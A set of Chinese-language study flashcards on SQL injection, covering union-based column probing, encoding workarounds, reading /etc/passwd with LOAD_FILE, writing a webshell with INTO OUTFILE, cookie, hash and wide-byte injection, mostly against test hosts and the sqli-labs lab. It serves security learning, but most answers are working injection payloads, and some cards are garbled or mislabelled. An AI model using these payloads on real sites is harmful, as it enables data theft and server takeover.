SQL注入 Flashcards

1
Q

sql注入一般在结尾加什么?

A


%23

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

SQL注入通常出现在什么地方?

A
post,get,cookie,hash
user-agent,client-ip,x-forwarded-for,referer
登陆界面
订单处理
搜索框
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

SQL注入时,http://…?id=1 union select 1,2,3,4,5,6 from xxx

显示为能够现实数字,但用user()替换显示位时,却不显示user,怎么解决?

A

很可能是编码问题
方法1,用hex():
id=-1 union select 1,2,hex(concat(database(),0x5c,user(),0x5c,version())),4,5,6 from xxx

方法2,用convert():
id=-1 union select 1,2,convert(concat(database(),0x5c,user(),0x5c,version()) using latin1),4,5,6 from xxx

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

sql注入时,http://www.test.com/news.php?id=0’ union select 1,2,3,4,5,6,7,8,9,10,11,12,13%23
提示类型错误怎么办

A

把数字用null全部替换掉
id =1 union select null,null,null,null,null,null,null,null,null,null,null,null,null%23
然后把null依次替换成相应数字,一次替换一个,如果正常返回就保留数字,如果错误就替换回null,在替换下一个数字(当然也可以替换文本‘a’,‘b’等,也可以数字文本相结合)

最后的结果是
union select null,2,3,null,‘a’,null,’b’,8,null,null,null,null,null%23,
这样就能够定位显示位是哪个了,这里如果开了gpc,可以把字符串都换成version()

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

sql注入时,http://www.test.com/news.php?id=12’ order by 13%23
页面显示正常,14错误,说明注入点为字符型,字段数为13
但http://www.test.com/news.php?id=0’ union select 1,2,3,4,5,6,7,8,9,10,11,12,13%23时,跳转到http://www.test.com/3,404错误,怎么解决?

A

用null替换掉异常位置,如:
http://www.test.com/news.php?id=0’ union select 1,2,null,4,5,6,7,8,concat(database(),0x3a,user(),0x3a,version()),10,11,12,13

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

sql注入时,查询字段数除了用?id=1 order by 寒可用什么方法?为什么可以用这个方法?

A

id = union select 1,2,3,4,5

原理:union select的前提是两侧字段数相同

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

MID()函数干什么的

A

截取字符串

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

SUBSTR()函数干什么的

A

截取字符串

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

CHAR(41)是什么意思

A

返回ASCII码对应的字符

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

ASCII(字符)是什么意思

A

返回字符对应的ASCII码

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

IF(逻辑表达式,若真的返回值1,若假的返回值2)

A

这是复习

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

LENGTH(字符串)

A

返回字符串长度

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

COUNT(列名)

A

返回当前列名下有效记录的数量

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

SLEEP(s)

A

静止s秒,数字类型,可自定义

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q


/**/

A

注释

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

CONCAT(字符串1,字符串2..)

A

拼接

17
Q

LOAD_FILE(文件名称)

A

加载文件,以便从网页上读取服务器上的文件
(表示路径的时候斜杠用/,windows也不例外。
如union select 1,2,3,load_file(‘F:/VHOST/test/1.txt’)

18
Q

INTO OUTFILE ‘文件名’

A

写入到文件,如:union select 1,2,3,version() into outfile(‘F:/VHOST/test/1.txt’)

19
Q

不只是and 1=1 and 1=2参数后面任意字符报错说明有漏洞,and exists(select * from user)可以说明有漏洞吗?

A

可以

正常则存在user表,报错则不存在

20
Q

使用union select读取文件/etc/passwd

A

?id=1 union all select LOAD_FILE(‘/etc/passwd’)–

21
Q

使用union select写入简易webshell(内容为:)

A

?id=1 UNION SELECT ‘’’’ INTO OUTFILE ‘‘/var/www/shell.php’’ –

22
Q

sqlserver管理员用户是什么?
mysql 的用户名都有哪些?
oracal的用户名都有哪些?

A

sqlserver:sa
mysql:root ,anonymous
oracal:SYS SYSTEM DBSNMP OUTLN

23
Q

mysql的元数据在哪里?

A

INFORMATION_SCHEMA

24
Q

oracal元数据都有哪些?

A

ALL_TABLES
ALL_TAB_COLUMNS
USER_开头,DBA_开头

25
Q

oracle(列举当前用户可访问的所有表):

A

SELECT OWNER,TABLE_NAME FROM ALL_TABLES ORDER BY TABLE_NAME;

26
Q

mysql(当前用户可访问的所有表和数据库)

A

SELECT table_schema,table_name FROM information_schema.tables;

27
Q

mysql(使用系统表列举所有可访问的表)

A

SELECT name FROM sysobjects WHERE xtype=’U’;

28
Q

mysql(使用目录视图列举所有可访问的表)

A

SELECT name FROM sys.tables;

29
Q

数据库操作类型有哪些?

A

增删改查:

INSERT DELETE UPDATE SELECT

30
Q

hash注入怎么做?

A
http://lab1.xseclab.com/code1_9f44bab1964d2f959cf509763980e156/?userid=1&pwd=ffifdyop
#ffifdyop经过md5加密后包含'or'
31
Q

cookie注入怎么做

A

cookie中加;id=1’看是否报错
基本查询:结果order by 3成功,4报错

表名 UNION SELECT 1,table_name,3 from information_schema.tables where table_schema=database()

列名 UNION SELECT 1,column_name,3 from information_schema.columns where table_name=0x7361655f757365725f73716c6938

32
Q

http://localhost/sqli-labs/Less-1/?id=1

怎样探测漏洞

A
'
"
%27
" / %22
; / %3B
%%2727
%25%27
`+HERP
'||'DERP
'+'herp
' ' DERP
触发异常,说明有漏洞,没反映的话试试%c0宽字节注入
33
Q

http: //localhost/sqli-labs/Less-1/?id=1 and 1=1 #页面正常
http: //localhost/sqli-labs/Less-1/?id=1 and 1=2 # 出错

A

则存在数字型注入

34
Q

http://localhost/sqli-labs/Less-1/?id=1 and 1=2 # 正常
http://localhost/sqli-labs/Less-1/?id=1’ and ‘1’=’2 #无输出
说明什么

A

这是个字符型SQL注入,未过滤单引号和and

35
Q

http://localhost/sqli-labs/Less-1/?id=1

gbxxxx系列编码或gbk,加单引号没反应怎么办?

A

可尝试宽字节%c0

http://localhost/sqli-labs/Less-1/?id=1%c0’ or 1=1 limit 2,1%23